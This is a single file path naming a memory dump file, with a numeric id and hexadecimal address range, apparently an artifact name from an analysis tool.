memory/3644-332-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp